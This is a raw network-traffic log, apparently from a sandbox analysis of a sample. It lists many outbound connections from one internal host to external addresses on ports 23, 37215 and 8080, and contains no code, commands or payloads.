    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52244
    Source: unknownNetwork traffic detected: HTTP traffic on port 39832 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39832
    Source: unknownNetwork traffic detected: HTTP traffic on port 50368 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 50368
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34698
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34774
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34788
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34802
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34822
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34848
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34866
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34876
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34884
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34894
    Source: unknownNetwork traffic detected: HTTP traffic on port 52504 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52504
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43390
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43416
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43448
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43506
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 54980
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43516
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 54994
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55042
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43568
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55058
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43596
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55074
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43612
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55082
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43622
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55104
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43642
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55110
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55162
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55184
    Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 50630
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.238.253.12:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.233.251.12:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.201.107.229:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.82.118.13:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.101.233.103:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.173.156.57:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.28.117.199:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.172.182.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.33.77.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.97.93.215:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.153.208.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.207.63.188:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.104.118.68:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.224.111.154:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.65.137.250:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.89.128.97:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.42.190.146:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.92.60.120:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.238.50.94:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.197.253.138:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.122.54.133:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.235.100.42:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.206.159.142:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.100.10.252:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.21.93.221:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.129.55.127:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.2.24.227:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.166.167.71:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.227.42.122:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.1.198.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.247.240.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.111.120.147:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.15.128.236:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.178.25.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.252.233.17:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.37.96.105:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.109.164.178:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.130.74.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.68.243.95:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.161.120.55:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.127.199.121:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.71.103.255:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.97.52.37:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.197.154.216:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.46.164.29:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.195.50.118:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.228.247.17:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.201.58.111:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.56.125.54:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.78.121.236:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.136.8.167:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.224.86.160:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.253.37.149:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.24.230.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.153.220.168:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.56.79.31:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.46.191.206:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.14.129.61:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.187.16.103:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.12.102.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.31.255.119:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.222.102.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.253.7.7:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.100.80.135:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.242.159.121:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.101.190.115:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.121.151.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.36.79.250:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.240.133.171:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.152.161.78:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.85.153.144:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.162.133.199:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.80.116.43:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.67.197.197:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.148.118.4:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.146.95.138:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.46.119.60:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.92.86.182:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.89.106.44:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.66.65.164:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.245.131.131:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.149.127.31:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.84.229.20:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.221.139.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.25.130.104:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.188.228.38:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.38.117.31:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.11.226.109:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.67.136.72:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.102.243.246:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.119.121.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.175.34.101:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.161.178.217:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.213.48.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.255.218.163:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.206.35.118:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.239.173.212:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.15.224.58:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.248.44.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.124.23.25:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.31.8.239:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.231.184.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.120.117.58:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.235.110.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.136.174.81:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.89.195.14:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.234.108.51:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.211.188.93:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.152.184.171:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.35.161.171:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.109.211.145:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.212.50.52:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.2.230.194:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.174.201.128:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.178.88.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.167.125.59:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.135.83.214:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.128.25.246:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.172.71.73:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.226.86.52:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.124.106.9:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.252.76.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.241.118.238:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.127.120.91:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.24.242.134:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.179.182.123:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.207.110.177:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.206.14.252:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.163.76.188:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.231.89.54:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.189.116.101:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.205.113.57:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.239.32.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.207.14.93:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.32.81.251:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.199.242.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.53.80.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.248.13.40:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.199.34.106:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.213.217.10:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.200.120.183:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.34.136.76:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.136.40.106:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.8.129.38:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.28.155.70:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.137.151.110:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.24.143.162:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.249.203.37:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.163.122.146:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.220.95.227:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.217.74.131:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.227.8.47:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.130.141.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.41.205.127:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.240.212.160:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.146.53.63:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.58.245.78:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.96.139.33:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.62.89.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:40675 -> 41.179.66.158:37215
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.155.71.4:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.158.1.6:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.63.9.222:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.241.182.40:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.194.83.4:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.62.66.202:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.95.241.195:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.234.23.138:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.236.169.155:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.234.165.151:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.223.163.77:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.244.233.159:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.216.173.83:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.72.81.141:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.134.220.11:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.245.108.37:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.146.3.169:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.52.215.137:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.126.176.117:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.127.224.68:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.133.99.115:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.69.196.163:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.144.40.5:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.127.173.36:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.214.119.218:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.34.42.67:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.133.30.120:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.122.230.20:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.199.77.131:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.71.132.151:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.188.0.94:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.57.118.58:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.4.138.156:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.54.128.63:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.201.212.123:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.60.247.15:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.215.53.134:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.152.175.223:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.226.143.114:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.187.39.195:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.54.54.9:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.37.128.115:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.206.26.98:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.15.47.239:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.30.35.45:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.182.37.88:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.48.199.9:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.52.140.231:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.56.39.31:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.120.85.157:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.237.67.232:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.119.255.100:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.201.95.138:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.12.236.149:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.197.7.144:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.165.151.239:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.45.178.196:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.56.177.16:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.73.229.47:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.84.22.171:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.173.55.93:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.119.48.215:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.242.74.58:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.95.165.9:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.149.76.224:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.49.43.13:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.14.8.3:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.180.173.57:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.74.244.227:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.186.107.237:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.118.33.170:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.252.20.178:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.51.199.237:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.228.215.101:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.0.68.229:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.29.53.11:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.176.119.221:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.39.192.192:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.68.175.158:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.64.176.164:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.182.27.26:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.240.215.13:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.44.41.128:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.6.252.224:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.213.222.173:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.235.159.133:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.198.126.50:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.212.102.184:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.62.210.177:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.132.247.87:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.219.4.160:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.252.94.96:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.244.151.180:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.84.222.252:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.115.230.125:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.86.254.240:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.213.25.39:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.66.240.45:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.233.50.180:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.137.227.185:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.104.179.164:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.87.115.33:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.134.195.171:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.156.184.249:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.9.109.11:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.47.202.234:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.49.45.217:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.119.247.20:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.204.252.33:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.169.142.29:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.39.195.103:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.136.157.138:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.136.15.18:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.225.82.156:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.253.160.180:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.134.81.155:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.140.6.18:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.19.148.96:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.104.182.212:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.254.3.243:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.80.249.254:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.48.138.98:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.179.53.26:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.219.190.52:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.110.212.19:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.46.95.122:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.136.45.177:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.25.232.120:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.220.9.185:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.215.248.125:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.168.103.147:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.64.203.127:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.246.132.44:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.224.250.100:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.144.25.76:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.23.185.70:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.26.49.7:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.68.206.43:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.26.68.214:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.254.98.30:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.225.179.253:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.249.172.21:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 31.86.87.222:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.62.101.63:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.113.255.190:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.157.209.27:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.242.205.121:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.152.97.179:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.196.112.226:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.4.237.231:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.169.113.89:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.237.247.7:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.219.220.68:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.232.50.59:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.162.99.47:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.218.81.94:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.130.32.225:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.2.120.112:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.108.105.7:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.243.109.87:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.183.43.71:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.72.143.217:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.229.39.186:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 95.186.94.108:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.72.68.148:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.127.153.132:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 62.5.66.16:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 94.234.37.13:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.36.93.83:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.136.35.109:8080
    Source: global trafficTCP traffic: 192.168.2.23:40684 -> 85.182.73.178:8080
